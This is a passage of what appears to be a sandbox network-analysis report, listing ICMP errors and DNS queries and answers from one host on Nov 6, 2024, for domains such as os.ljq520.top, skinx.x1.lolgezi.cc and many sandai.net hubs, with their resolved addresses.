                                                                                                                                            Nov 6, 2024 16:40:37.476526022 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:40.498121977 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:40.498145103 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Nov 6, 2024 16:40:14.939805031 CET192.168.2.101.1.1.10x6e5cStandard query (0)os.ljq520.topA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:20.272250891 CET192.168.2.101.1.1.10x6699Standard query (0)sl.gzskins.comA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:21.269759893 CET192.168.2.101.1.1.10x6699Standard query (0)sl.gzskins.comA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:24.815979958 CET192.168.2.101.1.1.10x5b9aStandard query (0)hub5pn.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:24.818273067 CET192.168.2.101.1.1.10x4990Standard query (0)hub5pnc.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.565762997 CET192.168.2.101.1.1.10x345aStandard query (0)hub5u.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.816654921 CET192.168.2.101.1.1.10x4990Standard query (0)hub5pnc.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.107685089 CET192.168.2.101.1.1.10x7c0Standard query (0)hub5c.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.113012075 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.120371103 CET192.168.2.101.1.1.10x7c2Standard query (0)skinx.x1.lolgezi.ccA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.124435902 CET192.168.2.101.1.1.10x7c3Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.128519058 CET192.168.2.101.1.1.10x7c4Standard query (0)hubstat.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.132817030 CET192.168.2.101.1.1.10x7c3Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.137305021 CET192.168.2.101.1.1.10xfed0Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.335452080 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.336807013 CET192.168.2.101.1.1.10xe53fStandard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.375659943 CET192.168.2.101.1.1.10x6723Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.608715057 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.616519928 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.623603106 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.630814075 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.201967001 CET192.168.2.101.1.1.10xfed0Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.199829102 CET192.168.2.101.1.1.10x7c5Standard query (0)hub5pr.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.228014946 CET192.168.2.101.1.1.10x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.252310991 CET192.168.2.101.1.1.10x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.810869932 CET192.168.2.101.1.1.10x7c8Standard query (0)bjbgp01.baidupcs.comA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.146684885 CET192.168.2.101.1.1.10x7c0Standard query (0)hub5c.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.162239075 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.170187950 CET192.168.2.101.1.1.10x7c2Standard query (0)skinx.x1.lolgezi.ccA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.177767992 CET192.168.2.101.1.1.10x7c3Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.236522913 CET192.168.2.101.1.1.10x7c4Standard query (0)hubstat.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.236623049 CET192.168.2.101.1.1.10x7c2Standard query (0)skinx.x1.lolgezi.ccA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.278858900 CET192.168.2.101.1.1.10x9249Standard query (0)skinx.x1.lolgezi.ccA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.459172964 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.460481882 CET192.168.2.101.1.1.10x427Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.970988035 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.977791071 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.984833956 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.996814013 CET192.168.2.101.1.1.10x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:34.163188934 CET192.168.2.101.1.1.10x7c5Standard query (0)download6.mcloud.139.comA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:35.278654099 CET192.168.2.101.1.1.10x7c6Standard query (0)hub5pr.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:35.398471117 CET192.168.2.101.1.1.10x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:35.498857021 CET192.168.2.101.1.1.10x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:41.260948896 CET192.168.2.101.1.1.10xbb24Standard query (0)skinx.x1.lolgezi.ccA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:42.778264046 CET192.168.2.101.1.1.10xd333Standard query (0)bjbgp01.baidupcs.comA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Nov 6, 2024 16:40:15.377311945 CET1.1.1.1192.168.2.100x6e5cNo error (0)os.ljq520.top120.27.243.153A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:21.407257080 CET1.1.1.1192.168.2.100x6699No error (0)sl.gzskins.comsl.gzskins.com.w.kunlunca.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:21.407257080 CET1.1.1.1192.168.2.100x6699No error (0)sl.gzskins.com.w.kunlunca.com180.163.146.103A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:21.407479048 CET1.1.1.1192.168.2.100x6699No error (0)sl.gzskins.comsl.gzskins.com.w.kunlunca.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:21.407479048 CET1.1.1.1192.168.2.100x6699No error (0)sl.gzskins.com.w.kunlunca.com180.163.146.103A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)hub5pn.hz.sandai.nethub5pn.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)hub5pn.sandai.netcnc.hub5pn.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net111.206.4.176A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net153.3.232.174A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net157.255.225.49A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net157.255.225.53A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net153.3.232.175A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net58.144.251.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net58.144.251.2A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net220.202.21.137A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net220.202.21.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:25.562308073 CET1.1.1.1192.168.2.100x5b9aNo error (0)cnc.hub5pn.sandai.net111.206.4.164A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET1.1.1.1192.168.2.100x4990No error (0)hub5pnc.hz.sandai.nethub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET1.1.1.1192.168.2.100x4990No error (0)hub5pnc.sandai.netcnc.hub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net47.92.202.235A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net39.98.66.213A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net139.224.45.180A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092367887 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net47.101.159.232A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET1.1.1.1192.168.2.100x4990No error (0)hub5pnc.hz.sandai.nethub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET1.1.1.1192.168.2.100x4990No error (0)hub5pnc.sandai.netcnc.hub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net47.92.202.235A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net39.98.66.213A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net139.224.45.180A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.092434883 CET1.1.1.1192.168.2.100x4990No error (0)cnc.hub5pnc.sandai.net47.101.159.232A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.286636114 CET1.1.1.1192.168.2.100x7c2No error (0)skinx.x1.lolgezi.cc107.148.237.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.335293055 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.342461109 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.369191885 CET1.1.1.1192.168.2.100x345aNo error (0)hub5u.hz.sandai.nethub5u.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.369191885 CET1.1.1.1192.168.2.100x345aNo error (0)hub5u.sandai.netbgphub5u.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.369191885 CET1.1.1.1192.168.2.100x345aNo error (0)bgphub5u.sandai.net47.102.130.81A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.369191885 CET1.1.1.1192.168.2.100x345aNo error (0)bgphub5u.sandai.net47.92.164.165A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.576039076 CET1.1.1.1192.168.2.100x6723No error (0)relay.phub.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.608295918 CET1.1.1.1192.168.2.100xe53fName error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.616324902 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.844070911 CET1.1.1.1192.168.2.100x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.844070911 CET1.1.1.1192.168.2.100x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.844070911 CET1.1.1.1192.168.2.100x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:26.844070911 CET1.1.1.1192.168.2.100x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)hub5c.hz.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.022819996 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362946033 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.362981081 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.431875944 CET1.1.1.1192.168.2.100x7c6No error (0)imhub5pr.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.566091061 CET1.1.1.1192.168.2.100x7c7No error (0)score.phub.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)hub5pr.sandai.netpr.x.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)pr.x.hub.sandai.net116.132.219.22A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)pr.x.hub.sandai.net140.206.220.33A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:30.021692991 CET1.1.1.1192.168.2.100x7c8No error (0)bjbgp01.baidupcs.combjbgp01.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:30.021692991 CET1.1.1.1192.168.2.100x7c8No error (0)bjbgp01.n.shifen.com113.200.1.7A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.296195984 CET1.1.1.1192.168.2.100x9249No error (0)skinx.x1.lolgezi.cc107.148.237.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.458899021 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.465991974 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.970666885 CET1.1.1.1192.168.2.100x427Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.977638960 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.992218971 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)hub5c.hz.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
